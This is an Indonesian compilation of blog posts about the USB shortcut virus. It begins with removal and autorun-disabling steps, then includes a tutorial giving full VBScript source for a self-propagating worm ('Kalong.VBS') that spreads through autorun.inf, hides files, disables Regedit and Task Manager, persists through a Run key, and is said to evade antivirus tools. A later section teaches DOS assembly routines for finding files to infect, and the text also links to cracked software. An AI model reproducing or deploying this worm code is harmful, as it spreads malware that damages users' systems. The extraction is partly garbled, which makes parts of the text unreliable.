MENGHAPUS VIRUS SHORTCUT: - Key : Hkey_local_machine\software\microsoft\windows\currentversion\

Berikut 8 langkah praktis untuk mendepak virus yang mampu mengubah folder yang a da di dalam USB flash disk menjadi shortcut tersebut:

1. Nonaktifkan System Restore untuk sementara selama proses pembersihan. 2. Putuskan komputer yang akan dibersihkan dari jaringan.

3. Matikan proses virus yang aktif di memori dengan menggunakan tools Ice Sword . S etelah tools tersebut terinstal, pilih file yang mempunyai icon Microsoft Visual Basic Project kemudian klik Terminate Process . Silahkan download tools tersebut di http://icesword.en.softonic.com/

4. Hapus registri yang sudah dibuat oleh virus dengan cara: -. Klik menu [Start]

-. Klik [Run]

-. Ketik REGEDIT.exe, kemudian klik tombol [OK]

-. Pada aplikasi Registry Editor, telusuri key [HKEY_CURRENT_USER\Software\Micro soft\Windows\CurrentVersion\Run]

-. Kemudian hapus key yang mempunyai data [C:\Document and Settings\%user%]. 5. Disable autoplay/autorun Windows. Copy script di bawah ini pada program notep ad kemudian simpan dengan nama REPAIR.INF, install file tersebut dengan cara: Kl ik kanan REPAIR.INF > INSTALL

[Version] Signature= $Chicago$ Provider=Vaksincom [DefaultInstall] AddReg=UnhookRegKey DelReg=del [UnhookRegKey] HKLM, Software\CLASSES\batfile\shell\open\command,,, " %1? %* HKLM, Software\CLASSES\comfile\shell\open\command,,, " %1? %* HKLM, Software\CLASSES\exefile\shell\open\command,,, " %1? %* HKLM, Software\CLASSES\piffile\shell\open\command,,, " %1? %* HKLM, Software\CLASSES\regfile\shell\open\command,,, regedit.exe %1? HKLM, Software\CLASSES\scrfile\shell\open\command,,, " %1? %*

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoDriveTypeAu toRun,0x000000ff,255

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer, NoDriveTypeAu toRun,0x000000ff,255

6. Hapus File induk dan file duplikat yang dibuat oleh virus termasuk di flash d isk. Untuk mempercepat proses pencarian, Anda dapat menggunakan fungsi Search . Seb elum melakukan pencarian sebaiknya tampilkan semua file yang tersembunyi dengan mengubah pada setting Folder Options.

Jangan sampai terjadi kesalahan pada saat menghapus file induk maupun file dupli kat yang telah dibuat oleh virus. Lalu hapus file induk virus yang mempunyai cir i-ciri:

-. Icon Microsoft Visual Basic Project .

-. Ukuran File 128 KB (untuk varian lain akan mempunyai ukuran yang bervariasi). -. Ekstesi file .EXE atau .SCR .

-. Type file Application atau Screen Saver .

Kemudian hapus File duplikat shortcut yang mempunyai ciri-ciri: >. Icon Folder atau icon

>. Ekstensi .LNK

>. Type File Shortcut >. Ukuran file 1 KB

Hapus juga file yang .DLL (contoh: ert.dll) dan file Autorun.inf di flash disk a tau folder yang di-share. Sementara untuk menghindari virus tersebut aktif kemba li, hapus file induk yang mempunyai ekstensi EXE atau SCR terlebih dahulu baru k emudian hapus file Shortcut (.LNK).

at proses tersebut, silahkan download tools UnHide File and Folder di http://www .flashshare.com/bfu/download.html.

Setelah diinstall, pilih direktori [C:\Documents and settings] dan folder yang a da di flash disk dengan cara menggeser ke kolom yang sudah tersedia. Pada menu [ Attributes] kosongkan semua pilihan yang ada, kemudian klik tombol [Change Attri butes].

8. Install security patch Microsoft Windows Shell shortcut handling remote code e xecution vulnerability-MS10-046'. Silakan download security patch tersebut di ht tp://www.microsoft.com/technet/security/Bulletin/MS10-046.mspx

Seperti biasa, untuk pembersihan secara optimal dan menecegah infeksi ulang, seb aiknya install dan scan dengan antivirus yang up-to-date dan sudah dapat mendete ksi virus ini dengan baik.

Original source: vaksin[dot]com & detikinet[dot]com CARA 2 MENGHAPUS VIRUS SHORTCUT:

Ciri-ciri virus shortcut :

Pertama-tama, setelah menginfeksi komputer, dia akan membuat file induk database .mdb di My Documents

Yang kedua adalah virus tersebut akan membuat file autorun.inf di setiap drive h arddisk, flash disk, dan folder tanpa kecuali.

Yang ketiga adalah dia akan membuat file Thumb.db (hati-hati, perhatikan bahwa f ile ini tanpa huruf s sedangkan thumbnail cache yang asli di komputer memiliki t ambahan huruf s alias thumbs.db) di setiap folder

Untuk memancing korban, dia akan membuat file Microsoft.lnk dan New Harry Potter and .lnk di setiap folder yang jika dieksekusi akan langsung mengaktifkan virus t ersebut.

Seperti halnya virus-virus lokal lainnya, dia akan membuat duplikat setiap folde r namun kali ini bukan dengan ekstensi .exe melainkan extensi .ink alias shortcu t.

Pada task manager terdapat proses services wscript.exe yang sedang berjalan. Dal am kondisi normal, tidak ada proses seperti ini.

Langkah-langkah menghapus virus shortcut :

1. Matikan System Restore. Sejak dulu saya selalu mematikan system restore seger a setelah proses instalasi windows. Untuk keperluan backup dan imaging system, s aya lebih memilih menggunakan third party seperti acronis ataupun Norton Ghost ( baca dan dowload : Norton Ghost 15.0.0.35659 (2010) Full Serial Crack)

2. Matikan proses virus wsrcipt.exe (C:\WINDOWS\System32\wscript.exe)

Bisa menggunakan Process Explorer atau misc. tool pada HijackThis (baca dan down load : HijackThis 2.0.2 ).

3. Hapus file virus database.mdb di My Documents.. 4. Hapus file duplikat virus..

Untuk proses penghapusan, anda bisa menggunakan fasilitas search pada Windows..

iles and folders keduanya telah dicentang.

Search file dengan nama autorun.inf ukurannya 8 KB Search file dengan nama Thumb.db ukurannya 8 KB Search file dengan ekstensi .lnk.lnk ukurannya 1 KB Hapus semua file yang ditemukan..

Untuk lebih memudahkan proses pencarian yang sekaligus menghapus file yang ditem ukan, anda bisa menggunakan software UTool, sebuah freeware yang dapat anda down load secara gratis. Program ini akan secara otomatis mencari dan kemudian mengha pus file-file yang diinginkan (lihat gambar).

5. Hapus registry Autorun yang dibuat virus dengan menggunakan HijackThis.. Cari di bagian HKCU\..\Run: yang berhubungan dengan file database.mdb (pada gamb ar namun file database.mdb udah saya hapus)

regedit_run

Untuk lebih memantabkan proses pencegahan dan melindungi komputer kita dari sera ngan virus lokal yang sangat memusingkan ini, anda dapat melakukan hal-hal berik ut:

1. Setelah proses instalasi windows, segera matikan system restore.

2. Install software third party misal Tweak UI atau Magic Tweak untuk mendisable autorun dan mencegah teraktivasinya file-file .inf. Mungkin pada Windows XP Pro fessional, proses menon-aktifkan autorun bisa dilakukan dengan mudah, namun pada versi Win XP Home, anda memerlukan software ini. Tambahan informasi, program Ma gicTweak selain berfungsi menon-aktifkan autorn dapat juga digunakan untuk menc egah dijalankannya file-file .inf File autorun.inf yang biasanya merupakan awal dari berjangkitnya virus akan secara otomatis diubah menjadi murni file txt alia s notepad oleh program ini dan dia tidak lagi bisa dieksekusi. Ini sangat memban tu jika memang secara tidak sengaja kita mengaktifkan atau mengeksekusi autorun. inf meski proses autorun sudah didisable untuk semua drive (termasuk flash disk) .

3. Setelah semua proses instalasi windows, driver, program, dan lain-lain telah selesai, segera backup image system anda menggunakan software macam Acronis True Image atau Norton Ghost, sehingga jika nanti ada masalah yang tidak dapat anda selesaikan dengan mudah, anda dapat merestoreasi backup system tersebut.

4. Jika perlu, instal juga Deep Freeze apabila komputer anda digunakan oleh bany ak orang, sehingga settingan komputer tidak akan berubah-ubah.

5. Update info: Ciri-ciri virus terdapatnya virus shortcut pada flashdisk dapat diketahui dengan perbedaan icon flashdisk tersebut yang biasanya berbentuk seper ti icon drive menjadi berubah seperti icon folder. Jika menemui icon seperti ini , berarti dalam flashdisk tersebut terdapat virus. Gunakan explorer dan buka fla shdisk lewat explorer (jangan klik 2x dari my computer) dan hapus file autorun d an file2 tersangka virus lainnya secara manual dengan menekan shift + DEL (supay a tidak tersangkut di recycle bin). Rata-rata virus lokal dapat dicegah dengan c ara manual seperti ini asalkan OPSI DISABLE AUTORUN pada windows dan/atau MagicT weak telah diaktifkan, dan juga OPSI DISABLE .INF FILE pada MagicTweak telah dia ktifkan.

amu setelah hapus virus shortcut jadi bebas deh dari virus shortcut. Original source: maswafa[dot]blogger[dot]com

Disable Autorun.inf Menghindari Virus 30 September 2010

Penulis: BinusHacker · Kategori Artikel: Virus BINUS HACKER Binus Hacker Is Not Criminal Banner

149 3 154 share

Beberapa orang ada yang berpikir bahwa file autorun.inf adalah virus, padahal se benarnya bukan. Autorun.inf adalah suatu sistem file yang digunakan oleh sistem operasi seperti Windows agar secara otomatis menjalankan program ketika removabl e media seperti CD-ROM, DVD-ROM atau USB Flash dimasukkan di komputer. untuk ala san kenyamanan fitur ini dirancang agar sebuah software yang dipasang pada sebua h disk dapat secara otomatis start saat disk dimasukkan.

Sayangnya autorun.inf ternyata menimbulkan masalah baru. fitur ini dimanfaatkan untuk penyebaran virus. keamanan pengguna pun terancam, mereka yang tidak bernia t untuk menjalankan sebuah software terpaksa harus terbelalak dengan kondisi tak mampu berbuat apa-apa untuk menghentikan virus yang langsung berakasi, seperti dalam kasus beberapa virus, yang memanfaatkan fitur ini untuk menyebarkan. ini d isebut Sebuah fitur Windows telah gagal ?

Me Non aktifkan AutoPlay bukan solusi karena ketika Anda membuka drive dari My C omputer, Windows masih akan menjalankan instruksi yang ditemukan di autorun.inf.

Ada perbedaan antara Autoplay dan Autorun. Autoplay adalah ketika Anda memasukka n CD / DVD atau USB flash drive, Anda mendapatkan kotak dialog yang menanyakan a pa yang ingin Anda lakukan Windows, sedangkan autorun akan langsung mengeksekusi perintah yang ada di file autorun.inf. dan ketika ini berjalan tidak ada sama s ekali kesempatan bagi Anda untuk membatalkan autorun.

Cara menonaktifkan autorun.

Langkah 1 : Click Start->Run atau tekan tombol Window + R pada keyboard untuk me nampilkan kotak dialog Run.

Langkah 2 : Ketik regedit lalu tekan Enter untuk menjalankan Registry Editor. Langkah 3 : Pada kiri, panel klik ganda folder untuk memperluas dan pergi ke HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer Langkah 4 : Pada panel sebelah kanan double klik NoDriveTypeAutoRun

Langkah 5 : Pada Value Data , ketik FF untuk Heksadesimal atau 255 untuk nilai d esimal.

Langkah 6 : Tutup Registry Editor dan restart komputer. Cara menonaktifkan autorun dengan Notepad

Berikut ini adalah kunci registri yang bisa Anda gunakan untuk mem blok autorun. inf. Buka notepad atau teks editor lainnya, salin teks di bawah ini dan simpan s ebagai NoAutoRun.reg. Pastikan save dengan ekstensi . Reg bukan. Txt.

REGEDIT4

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIniFileMappingAutoru n.inf]

@ = @ SYS: DoesNotExist

Jalankan file tersebut, klik Yes jika ada konfirmasi.

Masalah dengan hack ini adalah bahwa installer CD atau DVD tidak akan lagi berja lan secara otomatis, anda harus mencari file setup dengan manual. tapi saya piki r bukanlah masalah besar dibandingkan dengan jika terinfeksi oleh virus dan haru s menghabiskan berjam-jam membersihkannya.

Setelah Membaca, Ayo Berbagi: * facebook

Membuat Virus Sederhana Notepad 14 March 2009

Penulis: UtuH · Kategori Artikel: Cracking, Virus BINUS HACKER Binus Hacker Is Not Criminal Banner

168 1 171 share

Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai meliri k memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelekt ual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus deng an VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compile r yang terintegrasi dengannya, Windows Based Script Host.

Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Vi rus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban t anpa menungu User menjalankan infector-nya. Virus ini saya beri nama Kalong.VBS . S ekarang buka Notepad-nya. Copy kode berikut :

// Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan k egiatan virus //

on error resume next

// Dim kata-kata berikut ini //

dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

// Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information // isi = [autorun] & vbcrlf & shellexecute=wscript.exe k4l0n6.dll.vbs

set fs = createobject( Scripting.FileSystemObject ) set mf = fs.getfile(Wscript.ScriptFullname)

dim text,size size = mf.size

check = mf.drive.drivetype

set text = mf.openastextstream(1,-2) do while not text.atendofstream rekur = rekur & text.readline rekur = rekur & vbcrlf

loop do

// Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows) Set windowpath = fs.getspecialfolder(0)

set tf = fs.getfile(windowpath & \batch- k4l0n6.dll.vbs ) tf.attributes = 32

set tf=fs.createtextfile(windowpath & \batch- k4l0n6.dll.vbs ,2,true) tf.write rekursif

tf.close

set tf = fs.getfile(windowpath & \batch- k4l0n6.dll.vbs ) tf.attributes = 39

// Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok // Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives // Cek Drive //

If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> A: then

// Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\ // set tf=fs.getfile(flashdrive.path & \k4l0n6.dll.vbs )

tf.attributes =32

set tf=fs.createtextfile(flashdrive.path & \k4l0n6.dll.vbs ,2,true) tf.write rekursif

tf.close

set tf=fs.getfile(flashdrive.path & \k4l0n6.dll.vbs ) tf.attributes = 39

// Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information) // set tf =fs.getfile(flashdrive.path & \autorun.inf )

tf.attributes = 32

set tf=fs.createtextfile(flashdrive.path & \autorun.inf ,2,true) tf.write isi

tf.close

set tf = fs.getfile(flashdrive.path & \autorun.inf ) tf.attributes=39

end if next

// Manipulasi Registry //

set kalong = createobject( WScript.Shell )

// Manip - Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY //

kalong.regwrite HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Windo w Title , THE KALONG v.s. ZAY

// Manip Set agar file hidden tidak ditampilkan di Explorer //

kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Polic ies\Explorer\Advanced\Hidden , 0?, REG_DWORD

// Manip Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager // kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Polic ies\Explorer\NoFind , 1?, REG_DWORD kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Polic ies\Explorer\NoFolderOptions , 1?, REG_DWORD kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Polic ies\Explorer\NoRun , 1?, REG_DWORD kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Polic ies\System\DisableRegistryTools , 1?, REG_DWORD kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Polic ies\System\DisableTaskMgr , 1?, REG_DWORD

// Manip Disable klik kanan //

kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Polic ies\Explorer\NoViewContextMenu , 1?, REG_DWORD

// Manip - Munculkan Pesan Setiap Windows Startup //

kalong.regwrite HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winl ogon\LegalNoticeCaption , Worm Kalong. Variant from Rangga-Zay, don t panic all data are safe.

// Manip Aktif setiap Windows Startup //

kalong.regwrite HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ Systemdir , windowpath & \batch- k4l0n6.dll.vbs

// Manip Ubah RegisteredOwner dan Organization //

kalong.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\R egisteredOrganization , The Batrix

kalong.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\R egisteredOwner , Kalong

// Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan // if check <> 1 then

Wscript.sleep 200000 end if

loop while check <> 1

set sd = createobject( Wscript.shell )

sd.run windowpath & \explorer.exe /e,/select, & Wscript.ScriptFullname Akhir dari Kode

Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih All File s (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll jug a gak apa-apa tapi usaha agar tidak mencurigakan aja.

He..he Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pa kai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Ori ginal) juga bisa.

Setelah Membaca, Ayo Berbagi: * facebook Recommend on Facebook * twitter

Pemrograman Virus Komputer 14 November 2008

Penulis: UtuH · Kategori Artikel: Cracking, Virus BINUS HACKER Binus Hacker Is Not Criminal Banner

0 1 1 share

PEMPROGRAMAN VIRUS KOMPUTER 4. 1. Cara Kerja Virus Komputer

Cara kerja Virus Komputer pada umumnya adalah menyebarkan dirinya dengan cara an tara lain menularkan file-file executable atau file-file yang bisa dijalankan la ngsung dari DOS Command line . Untuk memperjelas mekanisme penyebaran di ilustra sikan pada gambar dibawah ini :

Gambar 4.1. Mekanisme Penularan

Sudah jadi sifat virus jika dia dijalankan, maka ia menulari program aplikasi ya ng lain, yang di maksud menulari adalah menyalin dirinya atau program virus ters ebut ke program aplikasi lainnya, jika dalm hal ini yang tertular adalah program Aplikasi 1, maka apabila program aplikasi 1 tersebut dijalankan, maka program a plikasi 1 yang sudah serinfeksi virus itu akan menularkan virus pada program apl ikasi yang ke 2 , maka baik program aplikasi 1 maupun 2, sudah merupakan program pemikul bagi virus itu sendiri, yang akan menularkan seluruh program aplikasi y ang ada.

Agar bisa bertindak sebagai virus komputer, sebuah program harus mempunyai 5 bua h kemampuan yang merupakan prinsip dari virus komputer. Kelima kemampuan itu ada lah :

Kemampuan mendapatkan informasi 2.

Kemampuan memeriksa program 3.

Kemampuan menggandakan diri / menularkan 4.

Kemampuan mengadakan manipulasi 5.

Kemampuan menyembunyikan diri sendiri

Satu persatu kemampuan itu akan dijelaskan pada subbab selanjutnya 4. 1.1. Kemampuan mendapatkan Informasi

ma informasi mengenai file yang akan diinfeksi, Virus Komputer biasa nya tidak m enulari 1 program saja, tapi sekumpulan program, contohnya File-file EXE, file-f ile COM, atau kedua-duanya, virus harus mendapatkan informasi tentang file terse but pada directory, hal-hal mengenai informasi pada file yang perlu diketahui an tara lain :

1. Apakah Extensi File tersebut ( COM,EXE, BAT) 2. Apa Atribut file ( Hidden, Readonly, Archive) 3. Besar File Yang akan Di infeksi

Informasi tersebut sangat bermanfaat bagi virus, dimana informasi mengenai Exten sion file berguna untuk virus yang menyerang file-file tertentu contohnya virus yang menyerang file EXE, virus tersebut harus mencari file-file EXE yang akan di tulari.

Informasi attribut berguna untuk memberikan pilihan pada virus apakah dapat meny erang file dengan attribut Readonly, Hidden ataukan virus harus mengeset attribu t file-file tersebut menjadi Normal, sehingga virus dapat menulari.

Informasi tentang ukuran file berguna untuk operasi matematis yang akan menghitu ng berapa besar file yang sudah tertular, dimana

Besar_file_terinfeksi = file_asli + Virus_size

Fungsi ini terutama dipakai oleh virus Non OverWriting. Dibawah ini cuplikan met ode virus untuk mendapatkan informasi tentang File :

Start : mov dx,offset File_to_infect ; cari seluruh file Mov ah,4Eh Mov cx, 3 ; Attribut File ; cari host file

int 21h ; Dos Intrupt cmp ax,12h ; Ada file lagi

je exit ; kalau tidak ada exit

file_to_infect db *.COM ; File yang akan diinfeksi ends start ; akhir kode Virus

Listing 4.1. Search First File

Dimana Dx menuju ke alamat yang berisi nama file yang akan di infeksi, sedangkan disini di gunakan DOS Interupt 21H dengan Service ah, 4EH yang berguna untuk me ncari file pertama yang cocok dengan DX ( Find First Matching File), dan mendapa t kan informasi tentang file yang berada di dalam directory, biasanya fungsi 4Eh ini selalu berpasangan dengan 4Fh, yaitu fungsi untuk mencari file berikutnya y ang cocok ( Find Next Maching File), sedangkan nilai CX,3 digunakan untuk mengec ek attribut dari file, apakah Hidden, ReadOnly, virus dapt mengeset kembali attr ibut file menjadi normal, sehingga virus dapat menginfeksi file tersebut.

4. 1. 2. Kemampuan Untuk Memeriksa Program

Kemampuan untuk memeriksa program sangat penting bagi Virus Komputer , karena un tuk mengetahui apakah file target sudah tertular atau belum, ini sangat penting karena virus tidak akan menularkan dirinya berkali-kali pada file yang sama, sel ain untuk mempercepat proses penularan juga untuk menjaga agar file korban tidak rusak, karena apabila penularan dilakukan berulang-ulang pada file yang sama, C

RC dari file tersebut akan kacau dan menyebabkan file yang tertular tidak jalan, biasaanya file rusak tersebut akan mengeluarkan pesan Divide Over Flow, atau Er ror in Exe File, selain itu file yang berkali-kali diifeksi akan bertambah besar , dan akan mencurigakan pemakai komputer. Seperti digambarkan dalam flowchart be rikut ini :

Gambar 4.2. Memeriksa Program

Berikut ini contoh listing dari kemampuan untuk memeriksa file

Dalam dokumen Key : Hkey_local_machine\software\microsoft\windows\currentversion\e xplorer Jenis : DWORD Nama : showdrivelettersfirst Data : 2 (Halaman 35-49)